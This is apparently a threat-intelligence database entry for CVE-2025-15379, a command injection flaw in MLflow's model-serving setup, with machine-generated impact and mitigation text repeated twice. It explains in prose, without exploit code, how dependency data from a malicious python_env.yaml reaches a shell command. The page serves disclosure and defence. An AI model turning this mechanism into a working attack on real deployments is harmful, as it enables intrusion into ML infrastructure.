CVE-2025-15379: CWE-77 Improper Neutralization of Special Elements used in a Command ('Command Injection') in mlflow mlflow/mlflow
CVE-2025-15379 is a critical command injection vulnerability in MLflow's model serving container initialization, specifically in the _install_model_dependencies_to_env() function. When deploying models with env_manager=LOCAL, MLflow unsafely interpolates dependency data from python_env. yaml into shell commands without sanitization, enabling attackers to execute arbitrary commands. This affects MLflow versions up to 3. 8. 0 and is fixed in 3. 8. 2. The vulnerability requires no authentication or user interaction and can lead to full system compromise. Organizations using MLflow for model deployment on local environments are at high risk.
AI Analysis
Technical Summary
CVE-2025-15379 is a critical command injection vulnerability identified in MLflow, an open-source platform widely used for managing the machine learning lifecycle. The flaw resides in the _install_model_dependencies_to_env() function within MLflow's model serving container initialization code. Specifically, when a model is deployed with the environment manager set to LOCAL, MLflow reads dependency specifications from the model artifact's python_env.yaml file. These dependencies are then directly interpolated into a shell command without any sanitization or validation. This unsafe handling allows an attacker who can supply a malicious model artifact to inject arbitrary shell commands, leading to remote code execution on the host system where the model is deployed. The vulnerability affects MLflow versions up to 3.8.0 and was addressed in version 3.8.2. The CVSS v3.0 base score is 10.0, reflecting its critical severity, with attack vector being network-based, no privileges or user interaction required, and full impact on confidentiality, integrity, and availability. Although no exploits have been observed in the wild yet, the vulnerability's nature and ease of exploitation make it a significant risk for organizations using MLflow for local model deployment.
Potential Impact
The impact of CVE-2025-15379 is severe, as it allows unauthenticated attackers to execute arbitrary commands on systems running vulnerable MLflow versions. This can lead to complete system compromise, including data theft, destruction, or manipulation, lateral movement within networks, and disruption of machine learning workflows. Organizations relying on MLflow for model deployment, especially in local environments, risk exposure of sensitive data and operational downtime. The vulnerability undermines the integrity and availability of ML models and associated infrastructure, potentially affecting business-critical AI services. Given MLflow's popularity in industries like finance, healthcare, and technology, the threat could have widespread consequences if exploited at scale.
Mitigation Recommendations
To mitigate this vulnerability, organizations should immediately upgrade MLflow to version 3.8.2 or later, where the issue is fixed. Additionally, implement strict validation and sanitization of all model artifacts before deployment, especially the python_env.yaml files, to prevent malicious content injection. Restrict model deployment permissions to trusted users and environments only. Employ containerization and sandboxing techniques to isolate model serving environments, limiting the impact of potential exploits. Monitor deployment logs for unusual command executions or anomalies. Incorporate automated security scanning of model artifacts in the CI/CD pipeline to detect malicious payloads early. Finally, maintain up-to-date backups and incident response plans tailored to ML infrastructure compromise scenarios.
Affected Countries
United States, Germany, United Kingdom, Canada, France, Japan, South Korea, Australia, India, China
CVE-2025-15379: CWE-77 Improper Neutralization of Special Elements used in a Command ('Command Injection') in mlflow mlflow/mlflow
Description
CVE-2025-15379 is a critical command injection vulnerability in MLflow's model serving container initialization, specifically in the _install_model_dependencies_to_env() function. When deploying models with env_manager=LOCAL, MLflow unsafely interpolates dependency data from python_env. yaml into shell commands without sanitization, enabling attackers to execute arbitrary commands. This affects MLflow versions up to 3. 8. 0 and is fixed in 3. 8. 2. The vulnerability requires no authentication or user interaction and can lead to full system compromise. Organizations using MLflow for model deployment on local environments are at high risk.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
CVE-2025-15379 is a critical command injection vulnerability identified in MLflow, an open-source platform widely used for managing the machine learning lifecycle. The flaw resides in the _install_model_dependencies_to_env() function within MLflow's model serving container initialization code. Specifically, when a model is deployed with the environment manager set to LOCAL, MLflow reads dependency specifications from the model artifact's python_env.yaml file. These dependencies are then directly interpolated into a shell command without any sanitization or validation. This unsafe handling allows an attacker who can supply a malicious model artifact to inject arbitrary shell commands, leading to remote code execution on the host system where the model is deployed. The vulnerability affects MLflow versions up to 3.8.0 and was addressed in version 3.8.2. The CVSS v3.0 base score is 10.0, reflecting its critical severity, with attack vector being network-based, no privileges or user interaction required, and full impact on confidentiality, integrity, and availability. Although no exploits have been observed in the wild yet, the vulnerability's nature and ease of exploitation make it a significant risk for organizations using MLflow for local model deployment.
Potential Impact
The impact of CVE-2025-15379 is severe, as it allows unauthenticated attackers to execute arbitrary commands on systems running vulnerable MLflow versions. This can lead to complete system compromise, including data theft, destruction, or manipulation, lateral movement within networks, and disruption of machine learning workflows. Organizations relying on MLflow for model deployment, especially in local environments, risk exposure of sensitive data and operational downtime. The vulnerability undermines the integrity and availability of ML models and associated infrastructure, potentially affecting business-critical AI services. Given MLflow's popularity in industries like finance, healthcare, and technology, the threat could have widespread consequences if exploited at scale.
Mitigation Recommendations
To mitigate this vulnerability, organizations should immediately upgrade MLflow to version 3.8.2 or later, where the issue is fixed. Additionally, implement strict validation and sanitization of all model artifacts before deployment, especially the python_env.yaml files, to prevent malicious content injection. Restrict model deployment permissions to trusted users and environments only. Employ containerization and sandboxing techniques to isolate model serving environments, limiting the impact of potential exploits. Monitor deployment logs for unusual command executions or anomalies. Incorporate automated security scanning of model artifacts in the CI/CD pipeline to detect malicious payloads early. Finally, maintain up-to-date backups and incident response plans tailored to ML infrastructure compromise scenarios.
Technical Details
- Data Version
- 5.2
- Assigner Short Name
- @huntr_ai
- Date Reserved
- 2025-12-30T21:24:21.058Z
- Cvss Version
- 3.0
- State
- PUBLISHED
Threat ID: 69ca2868e6bfc5ba1de5eb91
Added to database: 3/30/2026, 7:38:16 AM
Last enriched: 3/30/2026, 7:53:34 AM
Last updated: 3/30/2026, 10:05:54 AM
Views: 5
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.